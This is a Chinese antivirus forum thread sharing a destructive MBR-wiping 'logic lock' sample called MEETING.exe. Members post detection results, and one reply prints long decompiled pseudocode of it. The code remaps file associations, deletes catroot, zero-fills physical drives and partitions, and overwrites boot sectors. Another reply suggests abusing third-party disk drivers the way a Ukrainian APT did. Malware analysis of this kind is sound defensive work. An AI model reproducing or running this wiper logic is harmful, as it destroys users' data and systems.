收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 【搬运】B站某up公开的感染后无法进入UEFI固件的逻辑锁 ...
123456下一页
返回列表 发新帖
查看: 5628|回复: 57
收起左侧

[病毒样本] 【搬运】B站某up公开的感染后无法进入UEFI固件的逻辑锁样本

  [复制链接]
火绒爃
发表于 2022-8-4 13:44:39 | 显示全部楼层 |阅读模式
本帖最后由 火绒爃 于 2022-8-4 13:46 编辑

解压密码infected                         演示视频:【【自制病毒】连固件都进不去!禁用几乎所有后缀! 发作迅速的MBR病毒 -MEETING.exe-哔哩哔哩】 https://b23.tv/u12EkNF
双击测试请先看视频

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Solomondemeter
发表于 2022-8-4 13:48:05 | 显示全部楼层
eset miss,
https://www.virustotal.com/gui/f ... 5e21c81c7?nocache=1,目前仅仅2家报毒
回复

举报

aboringman
发表于 2022-8-4 13:49:01 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

anxiety520
发表于 2022-8-4 14:01:49 | 显示全部楼层
本帖最后由 anxiety520 于 2022-8-4 14:13 编辑

KES 扫描miss 双击运行后大量删除文件,SW报毒,随后电脑蓝屏,引导被毁像这种点开都要问运行或不运行的EDR和opentip也是查不出问题的,已上报




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

wowocock
发表于 2022-8-4 14:17:50 | 显示全部楼层
BOOL DoDestroy()
{
  HWND v0; // rax
  HMODULE v1; // rbx
  FARPROC RtlSetProcessIsCritical; // rdi
  FARPROC RtlSetThreadIsCritical; // rbx
  HANDLE v4; // rax
  __int64 v5; // rcx
  __int64 v6; // rcx
  const int v7; // eax
  HANDLE v8; // rax
  void *v9; // rsi
  DWORD v10; // edi
  HANDLE v11; // rax
  HWND v12; // rax
  HWND v13; // rax
  HMENU v14; // rax
  HWND v15; // rax
  HWND v16; // rsi
  int v17; // edi
  int v18; // ebx
  LONG v19; // eax
  HANDLE v20; // rax
  HANDLE v21; // rax
  HANDLE TokenHandle; // [rsp+40h] [rbp-38h] BYREF
  struct _LUID Luid; // [rsp+48h] [rbp-30h] BYREF
  struct _CONSOLE_SCREEN_BUFFER_INFO NewState; // [rsp+50h] [rbp-28h] BYREF

  v0 = FindWindowW(L"Shell_TrayWnd", 0i64);
  SendMessageW(v0, 0x111u, 0x1A3ui64, 0i64);
  v1 = GetModuleHandleW(L"ntdll.dll");
  RtlSetProcessIsCritical = GetProcAddress(v1, "RtlSetProcessIsCritical");
  RtlSetThreadIsCritical = GetProcAddress(v1, "RtlSetThreadIsCritical");
  v4 = GetCurrentProcess();
  if ( OpenProcessToken(v4, 0x20u, &TokenHandle) && LookupPrivilegeValueW(0i64, L"SeDebugPrivilege", &Luid) )
  {
    *(struct _LUID *)&NewState.dwCursorPosition.X = Luid;
    NewState.dwSize = (COORD)1;
    *(_DWORD *)&NewState.srWindow.Top = 2;
    AdjustTokenPrivileges(TokenHandle, 0, (PTOKEN_PRIVILEGES)&NewState, 0, 0i64, 0i64);
  }
  LOBYTE(v5) = 1;
  ((void (__fastcall *)(__int64, _QWORD, _QWORD))RtlSetProcessIsCritical)(v5, 0i64, 0i64);
  LOBYTE(v6) = 1;
  ((void (__fastcall *)(__int64, _QWORD, _QWORD))RtlSetThreadIsCritical)(v6, 0i64, 0i64);
  do
    LOWORD(v7) = GetAsyncKeyState(13);
  while ( !_bittest(&v7, 0xFu) );
  v8 = GetStdHandle(0xFFFFFFF5);
  LODWORD(TokenHandle) = 0;
  v9 = v8;
  GetConsoleScreenBufferInfo(v8, &NewState);
  v10 = NewState.dwSize.X * NewState.dwSize.Y;
  FillConsoleOutputCharacterW(v9, 0x20u, v10, 0, (LPDWORD)&Luid);
  GetConsoleScreenBufferInfo(v9, &NewState);
  FillConsoleOutputAttribute(v9, NewState.wAttributes, v10, 0, (LPDWORD)&Luid);
  SetConsoleCursorPosition(v9, 0);
  SetConsoleTitleW(" ");
  v11 = GetStdHandle(0xFFFFFFF5);
  SetConsoleTextAttribute(v11, 4u);
  system("assoc .exe=pngfile");
  system("assoc .ink=pngfile");
  system("assoc .pdf=pngfile");
  system("assoc .scr=pngfile");
  system("assoc .ini=pngfile");
  system("assoc .vbs=pngfile");
  system("assoc .bat=pngfile");
  system("assoc .cmd=pngfile");
  system("assoc .dll=pngfile");
  system("assoc .sys=pngfile");
  system("assoc .txt=pngfile");
  system("assoc .ppt=pngfile");
  system("assoc .pptx=pngfile");
  system("assoc .com=pngfile");
  system("assoc .zip=pngfile");
  system("assoc .7z=pngfile");
  system("assoc .docx=pngfile");
  system("assoc .pif=pngfile");
  system("assoc .msc=pngfile");
  system("assoc .dll=pngfile");
  system("assoc .msu=pngfile");
  system("assoc .sys=pngfile");
  system("@DEL /f /s /q %systemroot%\\System32\\catroot");
  CreateThread(0i64, 0i64, (LPTHREAD_START_ROUTINE)DestroyDiskThread, 0i64, 0, 0i64);
  v12 = FindWindowW(L"Shell_TrayWnd", 0i64);
  SendMessageW(v12, 0x111u, 0x1A0ui64, 0i64);
  system("cls");
  v13 = GetConsoleWindow();
  v14 = GetSystemMenu(v13, 0);
  DeleteMenu(v14, 0xF060u, 0);
  v15 = GetConsoleWindow();
  DrawMenuBar(v15);
  v16 = GetForegroundWindow();
  v17 = GetSystemMetrics(0);
  v18 = GetSystemMetrics(1);
  v19 = GetWindowLongW(v16, -16);
  SetWindowLongW(v16, -16, v19 & 0xFF3BFFFF | 0x81000000);
  SetWindowPos(v16, 0i64, 0, 0, v17, v18, 0);
  CreateThread(0i64, 0i64, (LPTHREAD_START_ROUTINE)sub_1400029B0, 0i64, 0, 0i64);
  LODWORD(TokenHandle) = 1966200;
  v20 = GetStdHandle(0xFFFFFFF5);
  SetConsoleCursorPosition(v20, (COORD)TokenHandle);
  system("color 0C");
  sub_1400026B0("There is a meeting in your computer SO HD IS LOCKED");
  Sleep(0x4E20u);
  CreateThread(0i64, 0i64, (LPTHREAD_START_ROUTINE)MessageBoxThread, 0i64, 0, 0i64);
  Sleep(0x1388u);
  v21 = GetCurrentProcess();
  OpenProcessToken(v21, 0x28u, (PHANDLE)&Luid);
  LookupPrivilegeValueW(0i64, L"SeShutdownPrivilege", (PLUID)&NewState.dwCursorPosition);
  NewState.dwSize = (COORD)1;
  *(_DWORD *)&NewState.srWindow.Top = 2;
  return AdjustTokenPrivileges(*(HANDLE *)&Luid, 0, (PTOKEN_PRIVILEGES)&NewState, 0, 0i64, 0i64);
}
回复

举报

wowocock
发表于 2022-8-4 14:18:31 | 显示全部楼层
BOOL __fastcall StartAddress(LPVOID lpThreadParameter)
{
  HANDLE v1; // rdi
  HLOCAL v2; // rsi
  __int64 v3; // rbp
  __int64 v4; // rbx
  HANDLE v5; // rdi
  HLOCAL v6; // rsi
  __int64 v7; // rbx
  HANDLE v8; // rdi
  HLOCAL v9; // rsi
  __int64 v10; // rbx
  HANDLE v11; // rdi
  HLOCAL v12; // rsi
  __int64 v13; // rbx
  HANDLE v14; // rdi
  HLOCAL v15; // rsi
  __int64 v16; // rbx
  HANDLE v17; // rdi
  HLOCAL v18; // rsi
  __int64 v19; // rbx
  HANDLE v20; // rdi
  HLOCAL v21; // rsi
  __int64 v22; // rbx
  HANDLE v23; // rdi
  HLOCAL v24; // rsi
  __int64 v25; // rbx
  HANDLE v26; // rdi
  HLOCAL v27; // rsi
  __int64 v28; // rbx
  HANDLE v29; // rdi
  HLOCAL v30; // rsi
  __int64 v31; // rbx
  HANDLE v32; // rdi
  HLOCAL v33; // rsi
  __int64 v34; // rbx
  HANDLE v35; // rdi
  HLOCAL v36; // rsi
  __int64 v37; // rbx
  HANDLE v38; // rdi
  HLOCAL v39; // rsi
  __int64 v40; // rbx
  HANDLE v41; // rdi
  HLOCAL v42; // rsi
  __int64 v43; // rbx
  HANDLE v44; // rdi
  HLOCAL v45; // rsi
  __int64 v46; // rbx
  HANDLE v47; // rdi
  HLOCAL v48; // rsi
  __int64 v49; // rbx
  HANDLE v50; // rdi
  HLOCAL v51; // rsi
  __int64 v52; // rbx
  HANDLE v53; // rdi
  HLOCAL v54; // rsi
  __int64 v55; // rbx
  HANDLE v56; // rdi
  HLOCAL v57; // rsi
  __int64 v58; // rbx
  HANDLE v59; // rdi
  HLOCAL v60; // rsi
  __int64 v61; // rbx
  HANDLE v62; // rbx
  HLOCAL v63; // rdi
  DWORD NumberOfBytesWritten; // [rsp+40h] [rbp-18h] BYREF

  v1 = CreateFileW(L"\\\\.\\PhysicalDrive0", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v2 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v1, 0, 0i64, 0);
  v3 = 0xF4040i64;
  v4 = 0xF4040i64;
  do
  {
    WriteFile(v1, v2, 0x200u, &NumberOfBytesWritten, 0i64);
    --v4;
  }
  while ( v4 );
  SetFilePointer(v1, 512, 0i64, 1u);
  CloseHandle(v1);
  v5 = CreateFileW(L"\\\\.\\PhysicalDrive1", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v6 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v5, 0, 0i64, 0);
  v7 = 0xF4040i64;
  do
  {
    WriteFile(v5, v6, 0x200u, &NumberOfBytesWritten, 0i64);
    --v7;
  }
  while ( v7 );
  SetFilePointer(v5, 512, 0i64, 1u);
  CloseHandle(v5);
  v8 = CreateFileW(L"\\\\.\\PhysicalDrive2", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v9 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v8, 0, 0i64, 0);
  v10 = 0xF4040i64;
  do
  {
    WriteFile(v8, v9, 0x200u, &NumberOfBytesWritten, 0i64);
    --v10;
  }
  while ( v10 );
  SetFilePointer(v8, 512, 0i64, 1u);
  CloseHandle(v8);
  v11 = CreateFileW(L"\\\\.\\C:", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v12 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v11, 0, 0i64, 0);
  v13 = 0xF4040i64;
  do
  {
    WriteFile(v11, v12, 0x200u, &NumberOfBytesWritten, 0i64);
    --v13;
  }
  while ( v13 );
  SetFilePointer(v11, 512, 0i64, 1u);
  CloseHandle(v11);
  v14 = CreateFileW(L"\\\\.\\D:", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v15 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v14, 0, 0i64, 0);
  v16 = 0xF4040i64;
  do
  {
    WriteFile(v14, v15, 0x200u, &NumberOfBytesWritten, 0i64);
    --v16;
  }
  while ( v16 );
  SetFilePointer(v14, 512, 0i64, 1u);
  CloseHandle(v14);
  v17 = CreateFileW(L"\\\\.\\E:", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v18 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v17, 0, 0i64, 0);
  v19 = 0xF4040i64;
  do
  {
    WriteFile(v17, v18, 0x200u, &NumberOfBytesWritten, 0i64);
    --v19;
  }
  while ( v19 );
  SetFilePointer(v17, 512, 0i64, 1u);
  CloseHandle(v17);
  v20 = CreateFileW(L"\\\\.\\Harddisk0Partition1", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v21 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v20, 0, 0i64, 0);
  v22 = 0xF4040i64;
  do
  {
    WriteFile(v20, v21, 0x200u, &NumberOfBytesWritten, 0i64);
    --v22;
  }
  while ( v22 );
  SetFilePointer(v20, 512, 0i64, 1u);
  CloseHandle(v20);
  v23 = CreateFileW(L"\\\\.\\Harddisk0Partition2", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v24 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v23, 0, 0i64, 0);
  v25 = 0xF4040i64;
  do
  {
    WriteFile(v23, v24, 0x200u, &NumberOfBytesWritten, 0i64);
    --v25;
  }
  while ( v25 );
  SetFilePointer(v23, 512, 0i64, 1u);
  CloseHandle(v23);
  v26 = CreateFileW(L"\\\\.\\Harddisk0Partition3", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v27 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v26, 0, 0i64, 0);
  v28 = 0xF4040i64;
  do
  {
    WriteFile(v26, v27, 0x200u, &NumberOfBytesWritten, 0i64);
    --v28;
  }
  while ( v28 );
  SetFilePointer(v26, 512, 0i64, 1u);
  CloseHandle(v26);
  v29 = CreateFileW(L"\\\\.\\Harddisk0Partition4", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v30 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v29, 0, 0i64, 0);
  v31 = 0xF4040i64;
  do
  {
    WriteFile(v29, v30, 0x200u, &NumberOfBytesWritten, 0i64);
    --v31;
  }
  while ( v31 );
  SetFilePointer(v29, 512, 0i64, 1u);
  CloseHandle(v29);
  v32 = CreateFileW(L"\\\\.\\Harddisk0Partition5", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v33 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v32, 0, 0i64, 0);
  v34 = 0xF4040i64;
  do
  {
    WriteFile(v32, v33, 0x200u, &NumberOfBytesWritten, 0i64);
    --v34;
  }
  while ( v34 );
  SetFilePointer(v32, 512, 0i64, 1u);
  CloseHandle(v32);
  v35 = CreateFileW(L"\\\\.\\Harddisk1Partition1", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v36 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v35, 0, 0i64, 0);
  v37 = 0xF4040i64;
  do
  {
    WriteFile(v35, v36, 0x200u, &NumberOfBytesWritten, 0i64);
    --v37;
  }
  while ( v37 );
  SetFilePointer(v35, 512, 0i64, 1u);
  CloseHandle(v35);
  v38 = CreateFileW(L"\\\\.\\Harddisk1Partition2", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v39 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v38, 0, 0i64, 0);
  v40 = 0xF4040i64;
  do
  {
    WriteFile(v38, v39, 0x200u, &NumberOfBytesWritten, 0i64);
    --v40;
  }
  while ( v40 );
  SetFilePointer(v38, 512, 0i64, 1u);
  CloseHandle(v38);
  v41 = CreateFileW(L"\\\\.\\Harddisk1Partition3", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v42 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v41, 0, 0i64, 0);
  v43 = 0xF4040i64;
  do
  {
    WriteFile(v41, v42, 0x200u, &NumberOfBytesWritten, 0i64);
    --v43;
  }
  while ( v43 );
  SetFilePointer(v41, 512, 0i64, 1u);
  CloseHandle(v41);
  v44 = CreateFileW(L"\\\\.\\Harddisk1Partition4", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v45 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v44, 0, 0i64, 0);
  v46 = 0xF4040i64;
  do
  {
    WriteFile(v44, v45, 0x200u, &NumberOfBytesWritten, 0i64);
    --v46;
  }
  while ( v46 );
  SetFilePointer(v44, 512, 0i64, 1u);
  CloseHandle(v44);
  v47 = CreateFileW(L"\\\\.\\Harddisk1Partition5", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v48 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v47, 0, 0i64, 0);
  v49 = 0xF4040i64;
  do
  {
    WriteFile(v47, v48, 0x200u, &NumberOfBytesWritten, 0i64);
    --v49;
  }
  while ( v49 );
  SetFilePointer(v47, 512, 0i64, 1u);
  CloseHandle(v47);
  v50 = CreateFileW(L"\\\\.\\Harddisk2Partition1", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v51 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v50, 0, 0i64, 0);
  v52 = 0xF4040i64;
  do
  {
    WriteFile(v50, v51, 0x200u, &NumberOfBytesWritten, 0i64);
    --v52;
  }
  while ( v52 );
  SetFilePointer(v50, 512, 0i64, 1u);
  CloseHandle(v50);
  v53 = CreateFileW(L"\\\\.\\Harddisk2Partition2", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v54 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v53, 0, 0i64, 0);
  v55 = 0xF4040i64;
  do
  {
    WriteFile(v53, v54, 0x200u, &NumberOfBytesWritten, 0i64);
    --v55;
  }
  while ( v55 );
  SetFilePointer(v53, 512, 0i64, 1u);
  CloseHandle(v53);
  v56 = CreateFileW(L"\\\\.\\Harddisk2Partition3", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v57 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v56, 0, 0i64, 0);
  v58 = 0xF4040i64;
  do
  {
    WriteFile(v56, v57, 0x200u, &NumberOfBytesWritten, 0i64);
    --v58;
  }
  while ( v58 );
  SetFilePointer(v56, 512, 0i64, 1u);
  CloseHandle(v56);
  v59 = CreateFileW(L"\\\\.\\Harddisk2Partition4", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v60 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v59, 0, 0i64, 0);
  v61 = 0xF4040i64;
  do
  {
    WriteFile(v59, v60, 0x200u, &NumberOfBytesWritten, 0i64);
    --v61;
  }
  while ( v61 );
  SetFilePointer(v59, 512, 0i64, 1u);
  CloseHandle(v59);
  v62 = CreateFileW(L"\\\\.\\Harddisk2Partition5", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v63 = LocalAlloc(0x40u, 0x200ui64);
  SetFilePointer(v62, 0, 0i64, 0);
  do
  {
    WriteFile(v62, v63, 0x200u, &NumberOfBytesWritten, 0i64);
    --v3;
  }
  while ( v3 );
  SetFilePointer(v62, 512, 0i64, 1u);
  return CloseHandle(v62);
}
回复

举报

wowocock
发表于 2022-8-4 14:18:58 | 显示全部楼层
BOOL __fastcall sub_140001D90(LPVOID lpThreadParameter)
{
  HANDLE v1; // rbx
  HANDLE v2; // rbx
  HANDLE v3; // rbx
  HANDLE v4; // rbx
  HANDLE v5; // rbx
  HANDLE v6; // rbx
  HANDLE v7; // rbx
  HANDLE v8; // rbx
  HANDLE v9; // rbx
  HANDLE v10; // rbx
  HANDLE v11; // rbx
  HANDLE v12; // rbx
  HANDLE v13; // rbx
  HANDLE v14; // rbx
  HANDLE v15; // rbx
  HANDLE v16; // rbx
  HANDLE v17; // rbx
  HANDLE v18; // rbx
  HANDLE v19; // rbx
  HANDLE v20; // rbx
  HANDLE v21; // rbx
  DWORD NumberOfBytesWritten; // [rsp+40h] [rbp-18h] BYREF

  v1 = CreateFileW(L"\\\\.\\PhysicalDrive0", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v1, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v1);
  v2 = CreateFileW(L"\\\\.\\PhysicalDrive1", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v2, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v2);
  v3 = CreateFileW(L"\\\\.\\PhysicalDrive2", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v3, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v3);
  v4 = CreateFileW(L"\\\\.\\C:", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v4, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v4);
  v5 = CreateFileW(L"\\\\.\\D:", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v5, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v5);
  v6 = CreateFileW(L"\\\\.\\E:", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v6, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v6);
  v7 = CreateFileW(L"\\\\.\\Harddisk0Partition1", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v7, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v7);
  v8 = CreateFileW(L"\\\\.\\Harddisk0Partition2", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v8, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v8);
  v9 = CreateFileW(L"\\\\.\\Harddisk0Partition3", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v9, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v9);
  v10 = CreateFileW(L"\\\\.\\Harddisk0Partition4", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v10, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v10);
  v11 = CreateFileW(L"\\\\.\\Harddisk0Partition5", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v11, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v11);
  v12 = CreateFileW(L"\\\\.\\Harddisk1Partition1", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v12, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v12);
  v13 = CreateFileW(L"\\\\.\\Harddisk1Partition2", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v13, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v13);
  v14 = CreateFileW(L"\\\\.\\Harddisk1Partition3", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v14, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v14);
  v15 = CreateFileW(L"\\\\.\\Harddisk1Partition4", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v15, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v15);
  v16 = CreateFileW(L"\\\\.\\Harddisk1Partition5", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v16, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v16);
  v17 = CreateFileW(L"\\\\.\\Harddisk2Partition1", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v17, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v17);
  v18 = CreateFileW(L"\\\\.\\Harddisk2Partition2", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v18, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v18);
  v19 = CreateFileW(L"\\\\.\\Harddisk2Partition3", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v19, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v19);
  v20 = CreateFileW(L"\\\\.\\Harddisk2Partition4", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v20, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v20);
  v21 = CreateFileW(L"\\\\.\\Harddisk2Partition5", 0x10000000u, 3u, 0i64, 3u, 0, 0i64);
  WriteFile(v21, &unk_140008050, 0x8000u, &NumberOfBytesWritten, 0i64);
  return CloseHandle(v21);
}
回复

举报

wowocock
发表于 2022-8-4 14:21:58 | 显示全部楼层
破坏程度有限,可以学学乌克兰APT那个,直接利用第三方磁盘驱动绕过各种限制保护,破坏硬盘。
回复

举报

UNknownOoo
发表于 2022-8-4 14:22:08 | 显示全部楼层
智量
扫描:拉黑(risktool
双击:WIBD:HEUR.MalBehavior.A0

重启电脑正常
回复

举报

00006666
发表于 2022-8-4 14:24:32 | 显示全部楼层
简单看了下,很低级........





360报rootkit病毒....


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
123456下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 12:24 , Processed in 0.136058 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表